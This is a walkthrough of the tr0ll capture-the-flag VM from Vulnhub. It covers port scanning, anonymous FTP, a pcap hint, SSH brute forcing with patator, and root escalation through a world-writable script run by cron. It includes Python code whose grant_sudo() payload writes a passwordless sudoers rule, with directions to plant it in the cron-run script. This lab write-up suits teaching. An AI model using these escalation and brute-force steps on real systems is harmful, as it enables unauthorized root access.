tr0ll VM Walkthrough

A walkthrough for the tr0ll VM by Maleus, hosted on Vulnhub.

catch me if you can logo image

First off, nmap found the following ports open:

nmap finds ports 21, 22 and 80 open

So port 80 is open, but before we visit it we check whether ports 21 and 22 are secured. Surprisingly, port 21 (FTP) allows anonymous login, and listing the FTP directory shows a lol.pcap file:

ftp shows a file

When we open this in Wireshark we find the following message:

wireshark message

Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close… gotta TRY HARDER!

So sup3rs3cr3tdirlol may be a clue to something, but we don’t know what yet, and there’s nothing else of any use in the packet capture, so let’s investigate port 80 through the web browser.
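Wireshark is the convenient way to read the hint out of lol.pcap, but the file format is simple enough that the same thing can be done by hand. The following is an added example, not code from the original walkthrough or from the VM author: a minimal classic-pcap reader that pulls printable strings out of TCP payloads. The capture it parses is constructed inline by build_sample_pcap() (one Ethernet/IPv4/TCP frame carrying the hint text quoted above), because the real lol.pcap is not reproduced on this page; addresses, ports and the zeroed checksums are arbitrary.

```python
"""Added example, not code from the original walkthrough or from the VM author:
a minimal pcap reader that pulls printable strings out of TCP payloads, the same
text Wireshark showed for lol.pcap. The capture parsed here is constructed in
build_sample_pcap() (one Ethernet/IPv4/TCP frame carrying the hint text the
walkthrough quotes), because the real lol.pcap is not reproduced on the page."""
import re
import struct

# Hint text as quoted in the walkthrough, re-typed here as the constructed payload.
HINT = (b"Well, well, well, aren't you just a clever little devil, you almost found "
        b"the sup3rs3cr3tdirlol :-P\n\n"
        b"Sucks, you were so close... gotta TRY HARDER!\n")


def build_sample_pcap(payload: bytes) -> bytes:
    """Constructed pcap: global header plus one record holding an Ethernet/IPv4/TCP frame.
    Addresses and ports are arbitrary; checksums are left at zero (the parser ignores them)."""
    tcp = struct.pack("!HHIIBBHHH", 20, 49152, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])) + tcp
    frame = b"\x00" * 6 + b"\x11" * 6 + b"\x08\x00" + ip
    # magic, version 2.4, thiszone, sigfigs, snaplen, linktype 1 (Ethernet)
    global_hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    # ts_sec, ts_usec, incl_len, orig_len
    record_hdr = struct.pack("<IIII", 0, 0, len(frame), len(frame))
    return global_hdr + record_hdr + frame


def tcp_payloads(pcap: bytes):
    """Yield the TCP payload of every Ethernet/IPv4/TCP record in a classic pcap file."""
    magic = pcap[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap (pcapng and nanosecond pcap are not handled)")
    linktype = struct.unpack(endian + "I", pcap[20:24])[0]
    if linktype != 1:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # too short, or not IPv4
            continue
        ihl = (frame[14] & 0x0F) * 4                          # IPv4 header length
        if frame[23] != 6:                                    # protocol field != TCP
            continue
        total_len = struct.unpack("!H", frame[16:18])[0]
        tcp_start = 14 + ihl
        data_off = (frame[tcp_start + 12] >> 4) * 4           # TCP header length
        # Stop at the IP total length so Ethernet padding is never read as payload.
        payload = frame[tcp_start + data_off:14 + total_len]
        if payload:
            yield payload


def printable_strings(data: bytes, min_len: int = 4):
    """Runs of at least min_len printable ASCII bytes, like strings(1)."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def extract_hints(pcap: bytes):
    """Printable strings from every TCP payload, in capture order."""
    found = []
    for payload in tcp_payloads(pcap):
        found.extend(printable_strings(payload))
    return found


def demo():
    return extract_hints(build_sample_pcap(HINT))


if __name__ == "__main__":
    for line in demo():
        print(line)
```

On a real capture, replace the constructed bytes with `open("lol.pcap", "rb").read()`; the reader rejects pcapng and nanosecond-resolution files rather than silently misparsing them, so convert those with editcap first.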

This serves a trollface image with no EXIF data and only static HTML in the source, so let’s scan port 80 with nikto:

robots found by nikto

Nikto finds a robots.txt file disallowing a secret directory, so we visit that but just find another troll image, again with no EXIF data. So we go back to the message from lol.pcap and request /sup3rs3cr3tdirlol/ in the browser, and this time we get a directory listing:

directory listing

The listing contains a file, which we download and run the file command on to see what it is:

file info

This shows us that the file is a 32-bit ELF executable, but I run a 64-bit VM, so first I have to set it up to run 32-bit binaries with these steps (running an unknown binary pulled off a CTF box is itself a risk: do it in a disposable VM, and try strings on it first, which often reveals the same message without executing anything):

dpkg --add-architecture i386

apt-get update

apt-get install lib32z1 lib32ncurses5 lib32stdc++6

Now we can execute it, and it prints a message:

file prints some hex

We request this hex string as a directory in the browser and find another directory listing:

listing shows 2 directories

These look like a list of possible usernames and a password file:

usernames list

password

Trying patator to log in over SSH with the contents of these files doesn’t work, but because this is a troll VM I then try the file name itself, Pass.txt, as the password in patator, which works with the overflow username. Between unsuccessful attempts, however, the VM bans my local IP and I have to deactivate and reactivate the network connection to get a new IP before trying again, so keep the attempts few and spaced out.

Once we SSH into the machine, we find that every so often it kicks us out with a message, so we check the cron log:

cronlog shows one entry

A Python file in it looks hopeful, and that same file is world-writable, so let’s have a look at it:

python script cleans temp folder

So what we want is root access, and editing this Python file gives us that, since cron runs it as root: whatever we put in it executes with root privileges on the next run. I amend it to add the overflow user to the sudoers file (in reality, at this point there are many ways to get root; it’s worth looking through other walkthroughs after you finish the VM, finding this point in them and seeing what solution everyone else came up with!)

adds user to sudoers file

So we wait until the VM kicks us out, which shows that the cron job has run, and SSH back in as the overflow user. Then we use sudo su and voila! We now have root access.
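The escalation above, as an added example that is not the walkthrough’s own code: the check that turns up a file any user may rewrite (here, a script that root’s cron job runs), and the payload such a script can carry. The user name overflow is from the walkthrough; the scratch tree, the cleaner script’s name and contents, and the sudoers.d fragment name are constructed for this example, and the sudoers.d directory is a parameter so the payload can be exercised somewhere other than /etc/sudoers.d.

```python
"""Added example, not the walkthrough's own code: the two halves of the tr0ll
privilege escalation. find_world_writable() is the check that turns up a file
any user may rewrite (here, a script that root's cron job runs); grant_sudo() is
the payload such a script can carry. The user name 'overflow' is from the
walkthrough; the scratch tree, the cleaner script's name and contents, and the
sudoers.d fragment name are constructed for this example."""
import os
import shutil
import stat
import subprocess
import tempfile


def find_world_writable(root):
    """Regular files under root whose mode grants write to 'other', i.e. the
    equivalent of: find ROOT -type f -perm -o+w. Symlinks are skipped because
    their 0777 mode says nothing about the target."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                hits.append(path)
    return sorted(hits)


def grant_sudo(user, sudoers_dir="/etc/sudoers.d", validate=True):
    """Payload for a script that runs as root: drop a sudoers.d fragment for
    `user`. A fragment beats editing /etc/sudoers in place: sudo only honours
    it as mode 0440 owned by root (ownership is automatic when the root cron
    job writes it), and `visudo -c -f` checks just this one file, so a typo
    does not break sudo for every account on the box."""
    line = f"{user} ALL=(ALL:ALL) NOPASSWD: ALL\n"
    # No '.' or '~' in the fragment name, or sudo silently ignores it.
    path = os.path.join(sudoers_dir, f"90-{user}")
    with open(path, "w") as fh:
        fh.write(line)
    os.chmod(path, 0o440)
    if validate and shutil.which("visudo"):
        res = subprocess.run(["visudo", "-c", "-f", path], capture_output=True, text=True)
        if res.returncode != 0:
            os.remove(path)
            raise RuntimeError(f"visudo rejected {path}: {res.stderr or res.stdout}")
    return path


def demo():
    """Exercise both steps against a constructed scratch tree and return the results."""
    scratch = tempfile.mkdtemp(prefix="tr0ll-")
    try:
        os.makedirs(os.path.join(scratch, "opt"))
        os.makedirs(os.path.join(scratch, "etc", "sudoers.d"))
        # Constructed stand-in for the cron-run cleaner: world-writable, which is the bug.
        cleaner = os.path.join(scratch, "opt", "cleaner.py")
        with open(cleaner, "w") as fh:
            fh.write("import os\nos.system('rm -rf /tmp/*')\n")
        os.chmod(cleaner, 0o666)
        # A normally-permissioned file, to show the check does not flag everything.
        hostname = os.path.join(scratch, "etc", "hostname")
        with open(hostname, "w") as fh:
            fh.write("tr0ll\n")
        os.chmod(hostname, 0o644)

        writable = [os.path.relpath(p, scratch) for p in find_world_writable(scratch)]
        # validate=False here: visudo would rightly object that the scratch file is not root-owned.
        fragment = grant_sudo("overflow", os.path.join(scratch, "etc", "sudoers.d"), validate=False)
        with open(fragment) as fh:
            content = fh.read()
        return {"writable": writable,
                "fragment": content,
                "mode": stat.S_IMODE(os.stat(fragment).st_mode)}
    finally:
        shutil.rmtree(scratch)


if __name__ == "__main__":
    print(demo())
```

Run as the low-privilege user, only find_world_writable() does anything useful; grant_sudo() has to be pasted into the world-writable script so that root’s cron job executes it, after which `sudo -l` as overflow shows the new rule. Leave validate at its default on the target so visudo catches a malformed fragment before it is left behind.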

flag achieved

Written on December 2, 2016